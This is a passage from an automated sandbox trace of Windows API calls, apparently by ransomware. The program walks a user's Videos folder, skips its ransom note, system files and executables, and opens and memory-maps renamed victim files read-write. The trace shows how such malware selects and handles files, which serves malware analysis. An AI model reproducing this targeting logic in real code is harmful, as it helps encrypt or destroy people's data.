cFileName="0xbWCInM_ATbmV-Z.mp4.hloEEL", cAlternateFileName="0XBWCI~1.HLO")) returned 1 [0186.198] lstrcmpiW (lpString1="0xbWCInM_ATbmV-Z.mp4.hloEEL", lpString2="DECRYPT-FILES.txt") returned -1 [0186.198] lstrcmpiW (lpString1="0xbWCInM_ATbmV-Z.mp4.hloEEL", lpString2="autorun.inf") returned -1 [0186.198] lstrcmpiW (lpString1="0xbWCInM_ATbmV-Z.mp4.hloEEL", lpString2="boot.ini") returned -1 [0186.198] lstrcmpiW (lpString1="0xbWCInM_ATbmV-Z.mp4.hloEEL", lpString2="desktop.ini") returned -1 [0186.198] lstrcmpiW (lpString1="0xbWCInM_ATbmV-Z.mp4.hloEEL", lpString2="ntuser.dat") returned -1 [0186.198] lstrcmpiW (lpString1="0xbWCInM_ATbmV-Z.mp4.hloEEL", lpString2="iconcache.db") returned -1 [0186.198] lstrcmpiW (lpString1="0xbWCInM_ATbmV-Z.mp4.hloEEL", lpString2="bootsect.bak") returned -1 [0186.198] lstrcmpiW (lpString1="0xbWCInM_ATbmV-Z.mp4.hloEEL", lpString2="ntuser.dat.log") returned -1 [0186.198] lstrcmpiW (lpString1="0xbWCInM_ATbmV-Z.mp4.hloEEL", lpString2="thumbs.db") returned -1 [0186.198] lstrcmpiW (lpString1="0xbWCInM_ATbmV-Z.mp4.hloEEL", lpString2="Bootfont.bin") returned -1 [0186.198] lstrlenW (lpString="0xbWCInM_ATbmV-Z.mp4.hloEEL") returned 27 [0186.198] lstrcmpiW (lpString1="hloEEL", lpString2="lnk") returned -1 [0186.198] lstrcmpiW (lpString1="hloEEL", lpString2="exe") returned 1 [0186.198] lstrcmpiW (lpString1="hloEEL", lpString2="sys") returned -1 [0186.198] lstrcmpiW (lpString1="hloEEL", lpString2="dll") returned 1 [0186.198] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\") returned 54 [0186.199] lstrlenW (lpString="0xbWCInM_ATbmV-Z.mp4.hloEEL") returned 27 [0186.199] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\" [0186.199] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\", lpString2="0xbWCInM_ATbmV-Z.mp4.hloEEL" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\0xbWCInM_ATbmV-Z.mp4.hloEEL") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\0xbWCInM_ATbmV-Z.mp4.hloEEL" [0186.199] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.199] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\0xbWCInM_ATbmV-Z.mp4.hloEEL" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ne-e0bic1cg5irwk\\0xbwcinm_atbmv-z.mp4.hloeel"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0186.199] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=53792) returned 1 [0186.199] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0186.199] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0186.200] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0186.200] CloseHandle (hObject=0x268) returned 1 [0186.200] CloseHandle (hObject=0x264) returned 1 [0186.200] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.200] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca1d24f0, ftCreationTime.dwHighDateTime=0x1d4c5e4, ftLastAccessTime.dwLowDateTime=0xda7c70b0, ftLastAccessTime.dwHighDateTime=0x1d4c5c3, ftLastWriteTime.dwLowDateTime=0xb0369620, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xdc56, dwReserved0=0x0, dwReserved1=0x0, cFileName="60wQ6b0LwaRhMx.flv.GfU8yS", cAlternateFileName="60WQ6B~1.GFU")) returned 1 [0186.200] lstrcmpiW (lpString1="60wQ6b0LwaRhMx.flv.GfU8yS", lpString2="DECRYPT-FILES.txt") returned -1 [0186.200] lstrcmpiW (lpString1="60wQ6b0LwaRhMx.flv.GfU8yS", lpString2="autorun.inf") returned -1 [0186.200] lstrcmpiW (lpString1="60wQ6b0LwaRhMx.flv.GfU8yS", lpString2="boot.ini") returned -1 [0186.200] lstrcmpiW (lpString1="60wQ6b0LwaRhMx.flv.GfU8yS", lpString2="desktop.ini") returned -1 [0186.200] lstrcmpiW (lpString1="60wQ6b0LwaRhMx.flv.GfU8yS", lpString2="ntuser.dat") returned -1 [0186.200] lstrcmpiW (lpString1="60wQ6b0LwaRhMx.flv.GfU8yS", lpString2="iconcache.db") returned -1 [0186.200] lstrcmpiW (lpString1="60wQ6b0LwaRhMx.flv.GfU8yS", lpString2="bootsect.bak") returned -1 [0186.200] lstrcmpiW (lpString1="60wQ6b0LwaRhMx.flv.GfU8yS", lpString2="ntuser.dat.log") returned -1 [0186.201] lstrcmpiW (lpString1="60wQ6b0LwaRhMx.flv.GfU8yS", lpString2="thumbs.db") returned -1 [0186.201] lstrcmpiW (lpString1="60wQ6b0LwaRhMx.flv.GfU8yS", lpString2="Bootfont.bin") returned -1 [0186.201] lstrlenW (lpString="60wQ6b0LwaRhMx.flv.GfU8yS") returned 25 [0186.201] lstrcmpiW (lpString1="GfU8yS", lpString2="lnk") returned -1 [0186.201] lstrcmpiW (lpString1="GfU8yS", lpString2="exe") returned 1 [0186.201] lstrcmpiW (lpString1="GfU8yS", lpString2="sys") returned -1 [0186.201] lstrcmpiW (lpString1="GfU8yS", lpString2="dll") returned 1 [0186.201] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\") returned 54 [0186.201] lstrlenW (lpString="60wQ6b0LwaRhMx.flv.GfU8yS") returned 25 [0186.201] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\" [0186.201] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\", lpString2="60wQ6b0LwaRhMx.flv.GfU8yS" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\60wQ6b0LwaRhMx.flv.GfU8yS") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\60wQ6b0LwaRhMx.flv.GfU8yS" [0186.201] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.201] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\60wQ6b0LwaRhMx.flv.GfU8yS" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ne-e0bic1cg5irwk\\60wq6b0lwarhmx.flv.gfu8ys"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0186.201] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=56406) returned 1 [0186.201] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0186.201] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0186.202] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0186.202] CloseHandle (hObject=0x268) returned 1 [0186.202] CloseHandle (hObject=0x264) returned 1 [0186.202] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.202] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x92c72710, ftCreationTime.dwHighDateTime=0x1d4ced8, ftLastAccessTime.dwLowDateTime=0xc9b0130, ftLastAccessTime.dwHighDateTime=0x1d4d4ae, ftLastWriteTime.dwLowDateTime=0xb038f780, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x16bc, dwReserved0=0x0, dwReserved1=0x0, cFileName="ajO4XvEv4yYsIs837v.swf.TtDMtPo", cAlternateFileName="AJO4XV~1.TTD")) returned 1 [0186.203] lstrcmpiW (lpString1="ajO4XvEv4yYsIs837v.swf.TtDMtPo", lpString2="DECRYPT-FILES.txt") returned -1 [0186.203] lstrcmpiW (lpString1="ajO4XvEv4yYsIs837v.swf.TtDMtPo", lpString2="autorun.inf") returned -1 [0186.203] lstrcmpiW (lpString1="ajO4XvEv4yYsIs837v.swf.TtDMtPo", lpString2="boot.ini") returned -1 [0186.203] lstrcmpiW (lpString1="ajO4XvEv4yYsIs837v.swf.TtDMtPo", lpString2="desktop.ini") returned -1 [0186.203] lstrcmpiW (lpString1="ajO4XvEv4yYsIs837v.swf.TtDMtPo", lpString2="ntuser.dat") returned -1 [0186.203] lstrcmpiW (lpString1="ajO4XvEv4yYsIs837v.swf.TtDMtPo", lpString2="iconcache.db") returned -1 [0186.203] lstrcmpiW (lpString1="ajO4XvEv4yYsIs837v.swf.TtDMtPo", lpString2="bootsect.bak") returned -1 [0186.203] lstrcmpiW (lpString1="ajO4XvEv4yYsIs837v.swf.TtDMtPo", lpString2="ntuser.dat.log") returned -1 [0186.203] lstrcmpiW (lpString1="ajO4XvEv4yYsIs837v.swf.TtDMtPo", lpString2="thumbs.db") returned -1 [0186.203] lstrcmpiW (lpString1="ajO4XvEv4yYsIs837v.swf.TtDMtPo", lpString2="Bootfont.bin") returned -1 [0186.203] lstrlenW (lpString="ajO4XvEv4yYsIs837v.swf.TtDMtPo") returned 30 [0186.203] lstrcmpiW (lpString1="TtDMtPo", lpString2="lnk") returned 1 [0186.203] lstrcmpiW (lpString1="TtDMtPo", lpString2="exe") returned 1 [0186.203] lstrcmpiW (lpString1="TtDMtPo", lpString2="sys") returned 1 [0186.203] lstrcmpiW (lpString1="TtDMtPo", lpString2="dll") returned 1 [0186.203] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\") returned 54 [0186.203] lstrlenW (lpString="ajO4XvEv4yYsIs837v.swf.TtDMtPo") returned 30 [0186.203] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\" [0186.203] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\", lpString2="ajO4XvEv4yYsIs837v.swf.TtDMtPo" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\ajO4XvEv4yYsIs837v.swf.TtDMtPo") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\ajO4XvEv4yYsIs837v.swf.TtDMtPo" [0186.203] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.203] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\ajO4XvEv4yYsIs837v.swf.TtDMtPo" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ne-e0bic1cg5irwk\\ajo4xvev4yysis837v.swf.ttdmtpo"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0186.204] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=5820) returned 1 [0186.204] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0186.204] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0186.204] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0186.204] CloseHandle (hObject=0x268) returned 1 [0186.204] CloseHandle (hObject=0x264) returned 1 [0186.204] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.205] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe21e0360, ftCreationTime.dwHighDateTime=0x1d4d0db, ftLastAccessTime.dwLowDateTime=0xbcfd6600, ftLastAccessTime.dwHighDateTime=0x1d4cba6, ftLastWriteTime.dwLowDateTime=0xb03dba40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x18980, dwReserved0=0x0, dwReserved1=0x0, cFileName="BQQtijYG2l71UpFZBjuL.flv.Ib684", cAlternateFileName="BQQTIJ~1.IB6")) returned 1 [0186.205] lstrcmpiW (lpString1="BQQtijYG2l71UpFZBjuL.flv.Ib684", lpString2="DECRYPT-FILES.txt") returned -1 [0186.205] lstrcmpiW (lpString1="BQQtijYG2l71UpFZBjuL.flv.Ib684", lpString2="autorun.inf") returned 1 [0186.205] lstrcmpiW (lpString1="BQQtijYG2l71UpFZBjuL.flv.Ib684", lpString2="boot.ini") returned 1 [0186.205] lstrcmpiW (lpString1="BQQtijYG2l71UpFZBjuL.flv.Ib684", lpString2="desktop.ini") returned -1 [0186.205] lstrcmpiW (lpString1="BQQtijYG2l71UpFZBjuL.flv.Ib684", lpString2="ntuser.dat") returned -1 [0186.205] lstrcmpiW (lpString1="BQQtijYG2l71UpFZBjuL.flv.Ib684", lpString2="iconcache.db") returned -1 [0186.205] lstrcmpiW (lpString1="BQQtijYG2l71UpFZBjuL.flv.Ib684", lpString2="bootsect.bak") returned 1 [0186.205] lstrcmpiW (lpString1="BQQtijYG2l71UpFZBjuL.flv.Ib684", lpString2="ntuser.dat.log") returned -1 [0186.205] lstrcmpiW (lpString1="BQQtijYG2l71UpFZBjuL.flv.Ib684", lpString2="thumbs.db") returned -1 [0186.205] lstrcmpiW (lpString1="BQQtijYG2l71UpFZBjuL.flv.Ib684", lpString2="Bootfont.bin") returned 1 [0186.205] lstrlenW (lpString="BQQtijYG2l71UpFZBjuL.flv.Ib684") returned 30 [0186.205] lstrcmpiW (lpString1="Ib684", lpString2="lnk") returned -1 [0186.205] lstrcmpiW (lpString1="Ib684", lpString2="exe") returned 1 [0186.205] lstrcmpiW (lpString1="Ib684", lpString2="sys") returned -1 [0186.205] lstrcmpiW (lpString1="Ib684", lpString2="dll") returned 1 [0186.205] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\") returned 54 [0186.205] lstrlenW (lpString="BQQtijYG2l71UpFZBjuL.flv.Ib684") returned 30 [0186.205] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\" [0186.205] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\", lpString2="BQQtijYG2l71UpFZBjuL.flv.Ib684" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\BQQtijYG2l71UpFZBjuL.flv.Ib684") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\BQQtijYG2l71UpFZBjuL.flv.Ib684" [0186.205] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.205] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\BQQtijYG2l71UpFZBjuL.flv.Ib684" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ne-e0bic1cg5irwk\\bqqtijyg2l71upfzbjul.flv.ib684"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0186.206] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=100736) returned 1 [0186.206] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0186.206] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0186.207] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0186.207] CloseHandle (hObject=0x268) returned 1 [0186.207] CloseHandle (hObject=0x264) returned 1 [0186.207] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.207] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb02f7200, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb02f7200, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb02f7200, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0186.207] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0186.207] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9adb1fa0, ftCreationTime.dwHighDateTime=0x1d4c6e1, ftLastAccessTime.dwLowDateTime=0xc32948c0, ftLastAccessTime.dwHighDateTime=0x1d4cde3, ftLastWriteTime.dwLowDateTime=0xb0401ba0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x29bd, dwReserved0=0x0, dwReserved1=0x0, cFileName="dZ3NoWA.flv.Z1Ddd", cAlternateFileName="DZ3NOW~1.Z1D")) returned 1 [0186.207] lstrcmpiW (lpString1="dZ3NoWA.flv.Z1Ddd", lpString2="DECRYPT-FILES.txt") returned 1 [0186.207] lstrcmpiW (lpString1="dZ3NoWA.flv.Z1Ddd", lpString2="autorun.inf") returned 1 [0186.207] lstrcmpiW (lpString1="dZ3NoWA.flv.Z1Ddd", lpString2="boot.ini") returned 1 [0186.207] lstrcmpiW (lpString1="dZ3NoWA.flv.Z1Ddd", lpString2="desktop.ini") returned 1 [0186.207] lstrcmpiW (lpString1="dZ3NoWA.flv.Z1Ddd", lpString2="ntuser.dat") returned -1 [0186.207] lstrcmpiW (lpString1="dZ3NoWA.flv.Z1Ddd", lpString2="iconcache.db") returned -1 [0186.207] lstrcmpiW (lpString1="dZ3NoWA.flv.Z1Ddd", lpString2="bootsect.bak") returned 1 [0186.207] lstrcmpiW (lpString1="dZ3NoWA.flv.Z1Ddd", lpString2="ntuser.dat.log") returned -1 [0186.207] lstrcmpiW (lpString1="dZ3NoWA.flv.Z1Ddd", lpString2="thumbs.db") returned -1 [0186.207] lstrcmpiW (lpString1="dZ3NoWA.flv.Z1Ddd", lpString2="Bootfont.bin") returned 1 [0186.207] lstrlenW (lpString="dZ3NoWA.flv.Z1Ddd") returned 17 [0186.207] lstrcmpiW (lpString1="Z1Ddd", lpString2="lnk") returned 1 [0186.207] lstrcmpiW (lpString1="Z1Ddd", lpString2="exe") returned 1 [0186.207] lstrcmpiW (lpString1="Z1Ddd", lpString2="sys") returned 1 [0186.207] lstrcmpiW (lpString1="Z1Ddd", lpString2="dll") returned 1 [0186.207] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\") returned 54 [0186.207] lstrlenW (lpString="dZ3NoWA.flv.Z1Ddd") returned 17 [0186.207] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\" [0186.208] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\", lpString2="dZ3NoWA.flv.Z1Ddd" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\dZ3NoWA.flv.Z1Ddd") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\dZ3NoWA.flv.Z1Ddd" [0186.208] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.208] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\dZ3NoWA.flv.Z1Ddd" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ne-e0bic1cg5irwk\\dz3nowa.flv.z1ddd"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0186.208] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=10685) returned 1 [0186.208] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0186.208] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0186.209] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0186.209] CloseHandle (hObject=0x268) returned 1 [0186.209] CloseHandle (hObject=0x264) returned 1 [0186.209] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.209] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5c6f6320, ftCreationTime.dwHighDateTime=0x1d4cb46, ftLastAccessTime.dwLowDateTime=0x23378b80, ftLastAccessTime.dwHighDateTime=0x1d4cc5b, ftLastWriteTime.dwLowDateTime=0xb044de60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x157dd, dwReserved0=0x0, dwReserved1=0x0, cFileName="EiBG_LHlML2AunS7K.swf.jpmxYD", cAlternateFileName="EIBG_L~1.JPM")) returned 1 [0186.209] lstrcmpiW (lpString1="EiBG_LHlML2AunS7K.swf.jpmxYD", lpString2="DECRYPT-FILES.txt") returned 1 [0186.209] lstrcmpiW (lpString1="EiBG_LHlML2AunS7K.swf.jpmxYD", lpString2="autorun.inf") returned 1 [0186.209] lstrcmpiW (lpString1="EiBG_LHlML2AunS7K.swf.jpmxYD", lpString2="boot.ini") returned 1 [0186.209] lstrcmpiW (lpString1="EiBG_LHlML2AunS7K.swf.jpmxYD", lpString2="desktop.ini") returned 1 [0186.209] lstrcmpiW (lpString1="EiBG_LHlML2AunS7K.swf.jpmxYD", lpString2="ntuser.dat") returned -1 [0186.209] lstrcmpiW (lpString1="EiBG_LHlML2AunS7K.swf.jpmxYD", lpString2="iconcache.db") returned -1 [0186.209] lstrcmpiW (lpString1="EiBG_LHlML2AunS7K.swf.jpmxYD", lpString2="bootsect.bak") returned 1 [0186.209] lstrcmpiW (lpString1="EiBG_LHlML2AunS7K.swf.jpmxYD", lpString2="ntuser.dat.log") returned -1 [0186.209] lstrcmpiW (lpString1="EiBG_LHlML2AunS7K.swf.jpmxYD", lpString2="thumbs.db") returned -1 [0186.210] lstrcmpiW (lpString1="EiBG_LHlML2AunS7K.swf.jpmxYD", lpString2="Bootfont.bin") returned 1 [0186.210] lstrlenW (lpString="EiBG_LHlML2AunS7K.swf.jpmxYD") returned 28 [0186.210] lstrcmpiW (lpString1="jpmxYD", lpString2="lnk") returned -1 [0186.210] lstrcmpiW (lpString1="jpmxYD", lpString2="exe") returned 1 [0186.210] lstrcmpiW (lpString1="jpmxYD", lpString2="sys") returned -1 [0186.210] lstrcmpiW (lpString1="jpmxYD", lpString2="dll") returned 1 [0186.210] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\") returned 54 [0186.210] lstrlenW (lpString="EiBG_LHlML2AunS7K.swf.jpmxYD") returned 28 [0186.210] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\" [0186.210] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\", lpString2="EiBG_LHlML2AunS7K.swf.jpmxYD" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\EiBG_LHlML2AunS7K.swf.jpmxYD") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\EiBG_LHlML2AunS7K.swf.jpmxYD" [0186.210] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.210] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\EiBG_LHlML2AunS7K.swf.jpmxYD" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ne-e0bic1cg5irwk\\eibg_lhlml2auns7k.swf.jpmxyd"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0186.210] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=88029) returned 1 [0186.211] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0186.211] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, 